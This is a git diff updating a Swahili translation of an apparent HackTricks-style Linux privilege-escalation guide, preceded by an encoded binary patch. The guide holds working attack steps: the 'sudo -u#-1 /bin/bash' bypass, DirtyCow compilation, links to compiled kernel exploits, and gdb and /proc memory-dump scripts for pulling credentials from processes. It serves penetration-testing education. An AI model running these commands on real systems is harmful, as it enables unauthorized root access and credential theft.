zXis!Trf*b6Iz4q&>wM*)_QBGnv(*Zy%0_FBmL>}SmSyo5`V@cd8*qtbMGJsWoi@v@
zlCmU<s$3Fwpy8Io8;_Uv6PCdD2^<uBZ!>RZl17%Q9m3gIrzTUSB*+t$>5%YU^`%98
z0CXz`@c(6m-#kWX@3ZyPK~hq5(EL7pXn1&c4)AsesayKA*O)x~g41Mr5G<c7AL8-W
z(9u*1dl}uK0^RO8sh)5k`6T2^;^M!+J;`hPnMf+~(n<QXOOH6Voil}t4SUtpp{!7&
zVm4sDp?&nF)(MxKyYKxDHN3GJ3$V2%4rx$E{tQ=<yOo>I5h09KEG~lW(v?U%B9hM4
z%SJ;y0v-yV(C{}PE@>9pu^H$Ezn}YO;N@hdRw(uyAv=8}yzPuR(PiK<^Sw<GSjkw9
z@ddA~x-s_cfGmj=hUYvP2XkI{ot<)Zz!s`8rLr{uj^kiiZEEAk$*LQamtQ5jVrkG*
z9)gi?5cWJEsi}+&#yFnc_eoQHxsZ1C2$tb@ZSZ%va^T3PGUc2{UzJeX@-1h!R;51I
zB)lFuKI*z-C^X&dJ(9%R6D}wg_H+U8$;2TlQN%H~zYw&yuWRL>v5P*O$KUk&J`y(t
zD1eE&ReDT)R&F1J&AZ;-%u579&M+Z~77op_i<E-Sk><nOj6~bi7My+Ra>I-iZ|Wok
zq7!r&#XKc*(>XFyu^5^YE=nAr4&SEa9YE-xN$F~b+kXV~t~fMjdRSGK{=#N+Jt@=l
zts&JrPt-GVVmj=ve6(#w2!9vB47az|($JslvcvCETEp{Mf&I@%1>Ne&rl$HfL2E%?
z<MFaf6jPU(nVJ4b_w`2_O&q*R+u^a_;JL^1N_@lZ50^6Gagv~#DB~{C$nL8K4hF%W
zUI%(Ik(QT(%2AjVH}%&}XX4ywn+)11zT=$DJ>lr##!_K?WgTTnL}+EyJ;YuAT*Rph
zT$}3;RY!)EwNasc=#a7|;`vf0yVQAg=2DQ${{2px61t~y^B(?{w|hE#_WL50R6Q46
z#6|eJ)us{eUx+^{`bi7Y*3J7eqt>#rHdk#~XV0LQWJnfvEqnt!%c%M4GXRRf2^S_+
z^5Lqsc=*i@!B!*Ua-3bY@&X;HI<#c-)f~uK$JE=NAo~pSp~?#={>i1Dk;a=eJg~92
z{n<WdMK`L=t@2R>p0x<pub8q|X+c^YdBKclSKKLJ>jCNXlT%lZve&Mf?X(4Kbz0jc
zH<Ybb8DAnCHd4T$PiHw;v$U;*m=Y1;%LUrGCH80E@89-`!<19MR-iZr^gI+hs0}Av
zvqk+cwdBb3pYe-&s8<ANL0FI!$egbIAtBZ(3aiJMQrOth{7nm4u*``)=Rn3ix4j`q
zQZTAEePmN<<vOzR`Fjc7@m<C@tLp&1xkMbKw#OlLn^~w5_Qg*OmnR?fIEHp`b^MG@
z!yn3*l$XCv+dxMt(U2_j4ZspA1SSwWaY+HB<L@oy#A%uqJVVY!0ZiA@Gx_nG{kuI!
zG?1OlfZ8=QOrVKwZ)l-lG=yFGa_NrH5&IQ_Yn;s9#`cV4pm1xY4;}LW8=F;-WnTWE
z!Hg?m!3`5B53V-on)*Qxi-V)%YJe^JzNZ0efcrpci55YA<_qDeI|uK()E2LyQxV}o
zcYiRVR45X`QhTfc^J_**h}$idmCkO=b$6~OV<C-aPe3*1V>uf8cWRtvqE0W!;#V|r
z8t2;2&YWrpSo$w+bpP4$ZbY4=3kFY`nIIuY-TS*wtWMD%ryf*OfFb#$Km4{*E6pt<
z6!ZOdnN{)&C^*+V145QvS3dUbXQY|F2kUb7sYHFI>#v~0jVAv1gviK6(6XBY@azo6
zk>;e4`&#WCYzvs_`GT%1N%iYgMpsZeYWw<Lh;@zjy#)-|jC)Mh9_zb_lHwKVvAgJv
zF`%>`;TmBUjDsR-d=U}+N9_KZj}-rS%cv5CH?P{F=4Jvt26ivvdmT_e86zwQ4zcG<
z*G({BHq}GeIW*9~6iW685Ee%BQqhM5AQW14<(~%Deda(^Ha|<kG)8Z#R4kpj9w;~C
zo41eHQ`k)(ICV{7h(R^Zms4~Rqf4GUqR(>LVU7G536#EUlu=B9#~v>pz_6tUV73BU
zu{OSozfUganwzhq$_+zuZUkz-ZuJj#7VT@K^=|=uO(M#F0(?&R-C1g?P$v#wN`+j`
zeDIHW_I83iJB905`yl!Tw{Bb5@nH*t&UCXIlFlM3GBQ4Z8aza}gcC{48UL8DvBS8%
zpubMEXCYaeP(8qTPe>^uf5oD59UrggmZ=MhMLjPgVE)s@)K|SsCQg!WqrzHq=(2G~
zl}w~db_m(l_f!?{{#k)E2_VnX1n)$zp_{MTR^MT4{Xdp98p7CaE_m(>HomxQ04OGc
z61zF?3)zN7M{A5>5v`~zry9pBo*3#ck8a`ai2r7X*puDOJQF#!++Hv8e|ajtIO{~H
z>ocEi?sF@D_+di2>rE|#8jl^Rdcy78-^jb>>5xOvVE_DL+K#ZpbUFwc^rysdH>bM#
zh3Fjrtw>=*DalxQ|Fi7+PEUrLHYzNmCqbA`c|PP+-Cu7j3!iNRP%7MlYevPKW)BS|
zz-N<!v+ca*q0$yl=v_{O`ATmaMJP}0XIWremExMpkEKm%z5tq%RtsGHw%+b{{n42!
z%!xPZOcu_zH46$Y=xcq|?d>-ko~+B{)P$%eT`3l?f?WfSkmakkgtXI5r&V|b&Uc<a
zFp}!Y4oXSbM=VHQ3xZkRtgDml-}@RIwfN`02c3S`6d>Nq-iR1zpZ7y`N7Lb1pEOeY
zZng*+eN2j~-oxoD8K8uApIOZ_$}ht$8$>>ofdxhzo*o??58i!xdKTUwZflo$W9n#g
zR$7{1d3K0BXsQ-_oq}A;t%od0ivhsBCnhQr^vF7+Ccn{Mz2s@g>W@hjSJHs_6qzSr
zqzT-s&gGCbH(3<@&rk;~mWvlIcrl9?4_rA`3?r(}$Qo6(I$(X*cSBY=@=o|!SA?9u
zztSy}158Ga7A<mz>{0i96z%Of#|LV+w_=s(%)SR!AV;_BS94V63msV=I!xA?H}6XM
zgAjh->o|`NTOG;sxC#7e7z+>iK^@4mS79uK;Eu&=^WhSNU)CalXJO)St$(!pl<biB
z1Z$=pGjT9k+zzv6%1LQyX*zR7nNWM)4>$xS&I)0X@{u!PIAw_K;24oT%^OyBD<7BP
z6^&HI6``yUR^gh9;@?$YYd=l~w4kOiC1p6Jb<f))k7v}cMdFcs=uVt%VStVimV4<(
zK>AvXjf~EvC=gJRgF9{9;qLbG@*SkJv$NSf$BsF3Ok4W+erklq`4tvNci!3C$EtAw
zWJ^_D*0+(>Kt+eg^$hQF3ji#Ci)CGF|8~gsc0E1Fcv^Vqgj2nhSPS|u9XBx?XSpD`
z{!kLu(j)<m@?{<z6CHNEg0;6_<N7>3!#xz`-uhJd{hlQ32XSn(+8r>kWY1`L${8t@
z5Oij&D;|K`Bi${QAX&2D6~)Sh-ld+4+q%6M$ZJs@fxM8plW*426}=L&KD&LN?$fmp
zFBfz;S#w=>LzLoI9@by^lkDdR<^I}=6nNdNK-s{9Ph<tylEVw>mH6mhPngqZ#yzy_
zr(|~M(;55DIqM#>ctWFc=8`gUY*d9|d>1%$D^hm!9dE6@Ke2zi;!Y2R_?!pv8=)OO
z2=W}yVE2Lp3X$ojDPE_$eG`uMAzJu78?+j{V+g<O4F1h^Zm)3SZMD-Bw%UW=j}ULQ
zGAF$p)78-_Gr}4+1>sPV-z0>02Wmn?$0wSPeMWsNRcy6x*5uQQP^w7Dvjp3bn+eo|
z26as{T=@q2Et1Ba)9lWgODv4o*T&QVYn;Z`v;`ipojNOtd`3(A!~LEL9E@bD)Fp=J
zxWxUpJ!)IJvarGPjZLIB3-&PQp+R?^%;WW5p*{D1ZqAI4d*DjBX9atF;fCsJ^EISy
zli|X`JSmn1TQ=6V{dp=;rag)w&BHvZBkk&tU?0H9)Mn5GapEb(O4jo>-c#T6HWB-F
zv@AUzjh?$1<prLU>-@FpLX$Hy0opUs#z*gX0VUJcOMxi^*zb(;tmmWQKwKfhMfr{J
zd?t!xE<|hgmcnK}GHympOZ7bnu^SR1ENfk9HRGT@{Xk6Ikc+oICQ-nDa!ya>X@Ss`
zptLX3!kN=1q%uybCnkVO$&BT{JHzc;3dymM{)R1XIbVJOS`z~ZvDqi$U2drpGT)_4
zYFTBDGV;MG<MT1^-NwzXXYN9CyJi+fLQ_`K^<zPn$Xm@G<^iP)2E(pVFA6@8W=})?
zOHVp~>qbl36;`sV0Ni{)qIwr*?C%Kp-;KY23MgNuo(9ZM4ihfl=CcjA1tVw$y5|Q%
zJ;wSgVM{(`aWYhc2R7p(0`~2W%S~>%!E^DUB?}kzOxq8cv6@G~JXecjxp=s4jzy{J
zX{W*v@5$FM0uhKgi&J7qf=njNVCRP3&p&xFJ%x&0_N8~pxp$*^_aYMqZ3=ODX8Xfm
z`Z4#Do;+$C!xPGn{k<A&-)>My+Z%O0nRXQDLg5LIe&(P|xfJ_Hj{zLAy^5{1!Yth#
zT3|%|2f|YJt=U?80~l4D={K>iVk@dwO&baiaB%3Jt18^pQOqBPa`AKo`J=7GE~P^e
zhIG#IPRI12DZwWV;oR+&*K}Yp7zCgExnCJ3YM%Q&o87`0GPRdG`txu_ILB7Rye!Po
zB#)ap)Rqm>9(9739ZJ#Z30=G!oQ6T9Sv5sDo0*mf%5<^OA1qZ+m@F!c4#F;jB@YPO
zJ1u4LQwg}8yq&6@NN-$<o42c?LQpJwO;Lkx;dM5EB7?so@Ui;BUT-|o?17|AIG;mX
zEj8A*Hf*YLBL22Cu?31phQI43^Giw$(ncu2aRy3MYB%pH=EhZY1H=%kZoVV@Hu!b>
zi&)gps6jue`Q_E6PlP?6p0Um#*ii(KSdRB;MJO$Z5kn*Sb|_DKK4L4Py<XXe&N+|W
zupr%4@KQQ_gMGWLo?XV+hC&h+-On)~jKi~})Ysonu+r+$XmHlC=mfY#q4~%ud4$oO
zuOwoT(aJ~Djx9z*x-y`_SA$F2u=8e%eRd<WCtv1xaU<;A9FbnPO!$kv8tF8<KW#kA
z7{8sYO!SSSyINK_u#I7XNYO@10VPYaJWH8pHU@{@O7O*F?3{m;DkTFx+@n4Z)olAM
zmVC01a<l+I7ca17%SR(o*xn#<0bjrfKmI8*@`x6o6@yN6X~}KsWd^ffM=A$yodb84
zcX~S5a8cujCV5MqH9}W(7kw?5`dMj%F|tQoT=G~@2A)F>_%&pd#Mb89e556v&{K}-
zBE<e)5rl*?f9ia@jTd@pXW&COhxCk=!(pn2<q7lz9EkWl#SaR*C6_yN4*(b2Qvq4f
zibf95<mLh7_66LTqnYeFAj-({gQRxG*g|DYMn#>PSVGmEgXk%4M0-1#&rB%I;B{n~
zj#FB9$M|;MbdE)IUx$R{YMo22?^oD{f6IQ>OEvfuwikZZ#jTq})RA>*<UYyiCrj#y
z3<Z{azy>(D%?)VuE{q~)iTxrI-QsIFI4XNxA0_L$XfzZ$C@x@Z)luC<I=D`Y!kxmf
z++0bdUWQgzB3JYUpcHP~9C1ThrITHG@nHyx7c`Jny*_1+0)-v@Yw3%7=1RuHGS3*g
z1G0v*<g7ukL*N)S-JMW{E~}i^{#<-0fZ1C%UG{Y*HHMD&-jK>_3*2{|{BiI^rg2_!
z*U)iK;;GPHx}?Vz{NPqso&@t}uvuj@Anxi(3_3AV#cc!dI=rEmu?)O-JAT9V(@F}8
zws<*dD{d}HUr<lAYALbDuU4KQQB7k<I3)kung*DVzdrY$0M-U5E<^k8`H7MQN+d5#
zq7ej{$#>#x21nF%t7f`ZzS5UHunDvjHVqgJRxPmryZ{9a?>?y#(H1d>RHWF?HQovT
zT&L2`AD-a#fERmQ05r-egm-&BCLS>)MZB4sAE(81sl)uDtKMtDUL9VJl(e{ZV2rMv
zCRU&M&>{IV-LAO)(Kq)3{<&Et0rz_SuP@tEWBa(cG`N3-vwf}OdFG8oDFLzon`9+E
zVmW{kmI}Dpq!LkaF$Q1mo1Qcg4bm<-R{i3W(_Iu^VuaNY3Niib1_9@0J(ZfU&&7`-
zv#B`A!QULBKOpGL`z8&in<d%pWdBHmA-U1D%D<Cw(MK>{+tiF@R|tt5-(yA{1E~yl
zF#qKPble-UV8quyzA0#1Wbyi8<<~hKSD$0K9uGc=wuie7ba0`Rho@x^B4|WQhuI7w
z29sfNG5+oR8gvInAv9v8u21hKCNm5DmBYjZ6o3&Xvdl_q?T9zbo3Ac9EzbuLT&jF7
zZ}r>HX6PYrTY}vCBu@-UW8E|Ld7FSzvaX3p9)G2g<GQbu5EF>X{%3=gJac3V9$Pnv
zM^gJ(?VD2V=69=amp7hIw*-fky&o|(9f0R>gDMvY2G@gxoux<ycdjECGttMx5TAJl
z1wMFA)fnQd*0=qSV9vV~|3VD0T)2kv@^bo%5WeVdnmwuSV5OOn9s@c8#!&owpO(BU
zdhOJFy@jU6Y;&jS1sIJ;OgoP?ecW^A$I-`=1}8V9ruTt<s}N6YJo&Gm0DmGKJ-u!G
zwPpVugBAwE$?eFOj^~U_^Rq*|Spj6uoD#C;rstxx*~#HTwT)1J_C~4UyR;75&bDLn
zFseh&%T6`euJmPu>nVbw=KAWk`NFZUPo%wC=W4}vYQbbUS?PoW>Czuj+@EP1Lbqnz
zdEwrZb2w*3pdNKKc_bzVF3P(=ke)_?&N3<eO~X8M(x^^w{P8v^rkU-EA+=g#rc0+x
zFs66iuPU}p?oE(}^KUIKn&V=<6yF)ty~lTR@GsGhs&yh=e?m&EYj+FNt*d3`cG6NI
za=xu$Z?DBhUi-q=(4XgH6&M0TXojNKAXc~Ww(}xTm$8ceo{R&_z7{?&gFuOdRK7o)
zPmE&QsyV{<S+h9Uc9~4ulC*Z!DX0cM`?Eual^Dyz+83#I-#?aKBF4kcO#oO2ZelXy
zt{0uM^|HBJ!A`l6<dliZNd|;hv8%-+O}1P@gSyfQKPH>Iv%77j9@=$=@6Xmr4rFd~
zcZ1@fEXAr}rky+Q+bb$4x<X)=dA%HgT9p{NbJCdkC2tl;lvkX>Ey&xCY~S1)sp{B$
z_@%x(5<MB?D!95lvT`-Iv@C{g{LqG@U1I{-6IV9>6+iwRNEU2y&G<`)G$l8wXMmdm
zbUGe3Y*oWD9Z!f?u*hWmv{ZHRFG@8qkY^mMwM%yyo^jVmySKMqXrirL1sWCch4q;`
zO&W-{<L^qsI>R{IzaSB?wqs^U^YQCSeXTEI-ivJc#Vsu@b&ZXU-arMx44R40UPa>?
zu>#l>5qfxd3?enA2o9gqu73rZMyrS1emK-Si<fxKY?|9N93i%t2!A_ad?KAu-Z9Uo
zz9MGEz8Z61;Ap+-<;#Hr6ws;$7*b#W2=6m%Z8=e7^Ud05vPGuxuY&oH@BH=tRgki{
zVrnDhU)~7+pG*6{F7rR%3pf#g;aX%>Rh9Ee&_0JG(59o8+56Y9ym??v{a<9S|NH&@
z`$hi0{&Lk~B*|mL6B)>J;vZ=ia*f)A1Y|-*M@V#6f%Z<C4c_+G%}Fv4E|?I?iVVQ{
z=gU7Y;h&Z8&o2097yRcg*rL6??bn9)KSj!g&)1Aw{AC9=b`Mu9!?gl%(7~;q%(6le
zaJl~}#G(m^GsgSRoG*Q45P{`HP*w!o$@>$;Xqo!&#b;bxB~>(~!ruzy6>yWJn$aSI
z{~YIk^9vXpoq)?3{<l_ziE1m4^&5@4|7oy)HW?uy(8fRwivBwXPisPe_Q->D2e!ZS
z7*HrejW~%F_wQ_FG$$y(piq2P?(dv`tUy~mYM#5`zcnNGfC;&0|1sq63=fHH<>9>_
zNccakuRjm@3Yd^rQ?4X`Yj^<x+7EKT6#vb<{^uMC5WzSFKdjOIt>J-y_l6{5|Ih#O
z-~6IaiBNlD^G)z?4ey_Y{O>jX&qDt98b|-LkpI20{)x!{4%YwQN91$7ds<oH;!}9X
QIKZE(qNc)oIg`Nu1!)r{CIA2c

literal 0
HcmV?d00001

diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md
index a34ae07cc..b65cffd3d 100644
--- a/src/linux-hardening/privilege-escalation/README.md
+++ b/src/linux-hardening/privilege-escalation/README.md
@@ -14,38 +14,38 @@ cat /etc/os-release 2>/dev/null # universal on modern systems
 ```
 ### Path
 
-Ikiwa una **write permissions on any folder inside the `PATH`** variable, unaweza kuwa na uwezo wa hijack baadhi ya libraries au binaries:
+Ikiwa **una ruhusa za kuandika kwenye folda yoyote ndani ya variable ya `PATH`** unaweza ku-hijack baadhi ya libraries au binaries:
 ```bash
 echo $PATH
 ```
-### Env info
+### Taarifa za Env
 
-Je, kuna taarifa za kuvutia, passwords au API keys ndani ya environment variables?
+Je, kuna taarifa za kuvutia, nywila au API keys katika environment variables?
 ```bash
 (env || set) 2>/dev/null
 ```
 ### Kernel exploits
 
-Kagua toleo la kernel na kama kuna exploit inayoweza kutumika ku-escalate privileges.
+Angalia toleo la kernel na uone kama kuna exploit yoyote inayoweza kutumika ku-escalate privileges.
 ```bash
 cat /proc/version
 uname -a
 searchsploit "Linux Kernel"
 ```
-Unaweza kupata orodha nzuri ya kernel zilizo na udhaifu na baadhi ya **compiled exploits** hapa: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) na [exploitdb sploits](https://gitlab.com/exploit-database/exploitdb-bin-sploits).\
+Unaweza kupata orodha nzuri ya kernel zilizo hatarini na baadhi ya **compiled exploits** hapa: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) and [exploitdb sploits](https://gitlab.com/exploit-database/exploitdb-bin-sploits).\
 Tovuti nyingine ambapo unaweza kupata baadhi ya **compiled exploits**: [https://github.com/bwbwbwbw/linux-exploit-binaries](https://github.com/bwbwbwbw/linux-exploit-binaries), [https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack)
 
-Ili kutoa toleo zote za kernel zilizo na udhaifu kutoka kwenye tovuti hiyo unaweza kufanya:
+Ili kutoa toleo zote za kernel zilizo hatarini kutoka kwenye tovuti hiyo unaweza kufanya:
 ```bash
 curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' '
 ```
-Vifaa vinavyoweza kusaidia kutafuta kernel exploits ni:
+Zana ambazo zinaweza kusaidia kutafuta kernel exploits ni:
 
 [linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester)\
 [linux-exploit-suggester2.pl](https://github.com/jondonas/linux-exploit-suggester-2)\
-[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (tekeleza kwenye victim, inachunguza tu exploits kwa kernel 2.x)
+[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (endesha KATIKA victim, inachunguza tu exploits za kernel 2.x)
 
-Daima **tafuta toleo la kernel kwenye Google**, labda toleo lako la kernel limeandikwa katika exploit fulani ya kernel na kwa hivyo utakuwa na uhakika kwamba exploit hii ni halali.
+Daima **tafuta toleo la kernel kwenye Google**, labda toleo lako la kernel limeandikwa katika exploit fulani na utakuwa hakika kwamba exploit hiyo ni halali.
 
 ### CVE-2016-5195 (DirtyCow)
 
@@ -57,36 +57,36 @@ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
 https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
 https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c
 ```
-### Sudo toleo
+### Toleo la sudo
 
-Kulingana na matoleo dhaifu ya sudo yanayoonekana katika:
+Kulingana na matoleo ya sudo yaliyo dhaifu yanayoonekana katika:
 ```bash
 searchsploit sudo
 ```
-Unaweza kukagua ikiwa toleo la sudo lina udhaifu kwa kutumia grep hii.
+Unaweza kuangalia ikiwa toleo la sudo linaweza kuathirika kwa kutumia grep hii.
 ```bash
 sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"
 ```
-#### sudo < v1.28
+#### sudo < v1.8.28
 
 Kutoka kwa @sickrov
 ```
 sudo -u#-1 /bin/bash
 ```
-### Dmesg signature verification failed
+### Dmesg: ukaguzi wa saini ulishindwa
 
-Angalia **smasher2 box of HTB** kwa **mfano** wa jinsi vuln hii ingeweza kutumika
+Angalia **smasher2 box of HTB** kwa **mfano** wa jinsi vuln inaweza kutumika
 ```bash
 dmesg 2>/dev/null | grep "signature"
 ```
-### Ukaguzi zaidi wa mfumo
+### Zaidi ya uorodheshaji wa mfumo
 ```bash
 date 2>/dev/null #Date
 (df -h || lsblk) #System stats
 lscpu #CPU info
 lpstat -a 2>/dev/null #Printers info
 ```
-## Orodhesha ulinzi unaowezekana
+## Orodhesha kinga zinazowezekana
 
 ### AppArmor
 ```bash
@@ -123,7 +123,7 @@ cat /proc/sys/kernel/randomize_va_space 2>/dev/null
 ```
 ## Docker Breakout
 
-Ikiwa uko ndani ya docker container unaweza kujaribu kutoroka kutoka ndani yake:
+Ikiwa uko ndani ya docker container, unaweza kujaribu kutoroka kutoka ndani yake:
 
 {{#ref}}
 docker-security/
@@ -131,7 +131,7 @@ docker-security/
 
 ## Diski
 
-Angalia **what is mounted and unmounted**, wapi na kwa nini. Ikiwa kitu chochote kime unmounted unaweza kujaribu ku-mount na kukagua kwa taarifa za kibinafsi
+Angalia **what is mounted and unmounted**, wapi na kwa nini. Ikiwa kitu chochote kime unmounted unaweza kujaribu kukimount na kukagua kwa taarifa binafsi
 ```bash
 ls /dev 2>/dev/null | grep -i "sd"
 cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null
@@ -144,56 +144,56 @@ Orodhesha binaries muhimu
 ```bash
 which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null
 ```
-Pia, angalia ikiwa **compiler yoyote imewekwa**. Hii ni muhimu ikiwa utahitaji kutumia kernel exploit, kwani inashauriwa kucompile kwenye mashine utakayotumia (au kwenye ile inayofanana).
+Pia, angalia ikiwa **compiler yoyote imewekwa**. Hii ni muhimu ikiwa unahitaji kutumia kernel exploit fulani, kwani inapendekezwa ku-compile kwenye mashine utakayoitumia (au kwenye ile inayofanana).
 ```bash
 (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")
 ```
-### Programu Zenye udhaifu zilizowekwa
+### Programu Zenye Udhaifu Zimewekwa
 
-Angalia **toleo la vifurushi na huduma zilizowekwa**. Huenda kuna toleo la zamani la Nagios (kwa mfano) ambalo linaweza kutumika kwa ajili ya escalating privileges…\
-Inashauriwa kukagua kwa mkono toleo la programu zilizowekwa zinazoshukiwa zaidi.
+Angalia **toleo la vifurushi na huduma zilizosanikishwa**. Pengine kuna toleo la zamani la Nagios (kwa mfano) that could be exploited for escalating privileges…\  
+Inashauriwa kukagua kwa mkono toleo la programu zilizosanikishwa zinazoshukiwa zaidi.
 ```bash
 dpkg -l #Debian
 rpm -qa #Centos
 ```
-Ikiwa una ufikiaji wa SSH kwenye mashine, unaweza pia kutumia **openVAS** kuangalia ikiwa programu zilizowekwa ni za zamani au zina udhaifu.
+Ikiwa una ufikiaji wa SSH kwenye mashine unaweza pia kutumia **openVAS** kuchunguza programu zilizopitwa na wakati na zilizo hatarini zilizowekwa ndani ya mashine.
 
-> [!NOTE] > _Kumbuka kwamba amri hizi zitaonyesha taarifa nyingi ambazo kwa kawaida hazitakuwa na umuhimu, kwa hivyo inashauriwa kutumia programu kama OpenVAS au zinazofanana ambazo zitachek ikiwa toleo lolote la programu zilizowekwa lina udhaifu dhidi ya exploits zinazojulikana_
+> [!NOTE] > _Kumbuka kwamba amri hizi zitaonyesha taarifa nyingi ambazo kwa ujumla hazitakuwa za manufaa, kwa hivyo inapendekezwa programu kama OpenVAS au nyingine zinazofanana ambazo zitakagua ikiwa toleo lolote la programu lililosakinishwa linaweza kuathiriwa na exploits zinazojulikana_
 
 ## Michakato
 
-Angalia **michakato gani** inaendeshwa na ukague ikiwa mchakato wowote una **uruhusa zaidi kuliko inavyopaswa** (labda tomcat ikitekelezwa na root?)
+Tazama **ni michakato gani** inayoendeshwa na ukague ikiwa kuna mchakato wowote unao **idhinishwa zaidi kuliko inavyostahili** (labda tomcat inaendeshwa na root?)
 ```bash
 ps aux
 ps -ef
 top -n 1
 ```
-Kila wakati angalia uwezekano wa [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](electron-cef-chromium-debugger-abuse.md). **Linpeas** hutambua hayo kwa kuangalia parameter `--inspect` ndani ya mstari wa amri wa mchakato.\
-Pia **angalia vibali vyako juu ya binaries za mchakato**, labda unaweza kuzibadilisha.
+Always check for possible [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](electron-cef-chromium-debugger-abuse.md). **Linpeas** hutambua hayo kwa kuangalia parameter `--inspect` ndani ya mstari wa amri wa mchakato.\
+Pia **check your privileges over the processes binaries**, labda unaweza kuwaeza kuandika juu ya baadhi yao.
 
-### Ufuatiliaji wa mchakato
+### Process monitoring
 
-Unaweza kutumia zana kama [**pspy**](https://github.com/DominicBreuker/pspy) kufuatilia mchakato. Hii inaweza kuwa muhimu sana kutambua mchakato dhaifu yanayoendeshwa mara kwa mara au wakati seti ya mahitaji yanatimizwa.
+Unaweza kutumia zana kama [**pspy**](https://github.com/DominicBreuker/pspy) kufuatilia michakato. Hii inaweza kuwa ya msaada mkubwa kubaini michakato dhaifu inayotekelezwa mara kwa mara au wakati seti ya mahitaji yanatimizwa.
 
-### Kumbukumbu ya mchakato
+### Process memory
 
-Huduma kadhaa za server huhifadhi **credentials kwa maandishi wazi ndani ya memory**.\
-Kwa kawaida utahitaji **root privileges** kusoma memory ya michakato inayomilikiwa na watumiaji wengine, kwa hiyo hii kwa kawaida ni ya zaidi matumizi wakati tayari uko root na unataka kugundua credentials zaidi.\
-Hata hivyo, kumbuka kwamba **kama mtumiaji wa kawaida unaweza kusoma memory ya michakato unayomiliki**.
+Baadhi ya services za server huhifadhi **credentials in clear text inside the memory**.\
+Kawaida utahitaji **root privileges** kusoma kumbukumbu za michakato inayomilikiwa na watumiaji wengine, kwa hivyo hii kwa kawaida ni ya msaada zaidi unapokuwa tayari root na unataka kugundua credentials zaidi.\
+Hata hivyo, kumbuka kwamba **as a regular user you can read the memory of the processes you own**.
 
 > [!WARNING]
-> Kumbuka kwamba sasa mashine nyingi **haziruhusu ptrace kwa default** ambayo inamaanisha huwezi ku-dump mchakato mwingine inayomilikiwa na mtumiaji asiye na vibali.
+> Kumbuka kwamba sasa hivi mashine nyingi **haziruhusu ptrace kwa default** ambayo inamaanisha kwamba huwezi dump michakato mingine inayomilikiwa na mtumiaji wako asiye na idhini.
 >
-> The file _**/proc/sys/kernel/yama/ptrace_scope**_ controls the accessibility of ptrace:
+> The file _**/proc/sys/kernel/yama/ptrace_scope**_ inasimamia upatikanaji wa ptrace:
 >
-> - **kernel.yama.ptrace_scope = 0**: all processes can be debugged, as long as they have the same uid. This is the classical way of how ptracing worked.
+> - **kernel.yama.ptrace_scope = 0**: all processes can be debugged, as long as they have the same uid. Hii ndilo namna ya jadi jinsi ptracing ilivyofanya kazi.
 > - **kernel.yama.ptrace_scope = 1**: only a parent process can be debugged.
 > - **kernel.yama.ptrace_scope = 2**: Only admin can use ptrace, as it required CAP_SYS_PTRACE capability.
 > - **kernel.yama.ptrace_scope = 3**: No processes may be traced with ptrace. Once set, a reboot is needed to enable ptracing again.
 
 #### GDB
 
-If you have access to the memory of an FTP service (for example) you could get the Heap and search inside of its credentials.
+Ikiwa una ufikiaji wa kumbukumbu za huduma ya FTP (kwa mfano) unaweza kupata Heap na kutafuta ndani yake credentials.
 ```bash
 gdb -p <FTP_PROCESS_PID>
 (gdb) info proc mappings
@@ -202,7 +202,7 @@ gdb -p <FTP_PROCESS_PID>
 (gdb) q
 strings /tmp/mem_ftp #User and password
 ```
-#### GDB Script
+#### Skripti ya GDB
 ```bash:dump-memory.sh
 #!/bin/bash
 #./dump-memory.sh <PID>
@@ -215,7 +215,7 @@ done
 ```
 #### /proc/$pid/maps & /proc/$pid/mem
 
-Kwa ID ya mchakato fulani, **maps inaonyesha jinsi memory inavyopangwa ndani ya nafasi ya anwani za virtual za mchakato huo**; pia inaonyesha **idhinishaji za kila eneo lililopangwa**. Faili bandia **mem** **inafunua memory ya mchakato yenyewe**. Kutoka kwenye faili ya **maps** tunajua ni **maeneo gani ya memory yanayosomika** na offsets zao. Tunatumia taarifa hizi ili **kutafuta (seek) ndani ya faili ya mem na ku-dump maeneo yote yanayosomika** kwenye faili.
+Kwa ID ya mchakato fulani, **maps zinaonyesha jinsi kumbukumbu inavyopangwa ndani ya nafasi ya anwani pepe ya mchakato**; pia inaonyesha **uruhusa za kila eneo lililopangwa**. Faili bandia **mem** **inafunua moja kwa moja kumbukumbu za mchakato**. Kutoka kwenye faili ya **maps** tunajua ni **eneo gani za kumbukumbu zinazosomika** na offsets zao. Tunatumia taarifa hizi **kutafuta ndani ya faili ya mem na dump maeneo yote yanayosomika** katika faili.
 ```bash
 procdump()
 (
@@ -230,14 +230,14 @@ rm $1*.bin
 ```
 #### /dev/mem
 
-`/dev/mem` hutoa ufikiaji wa **kumbukumbu ya kimwili** za mfumo, sio kumbukumbu za virtual. Nafasi ya anwani ya virtual ya kernel inaweza kufikiwa kwa kutumia /dev/kmem.\
-Kwa kawaida, `/dev/mem` inaweza kusomwa tu na **root** na kikundi cha kmem.
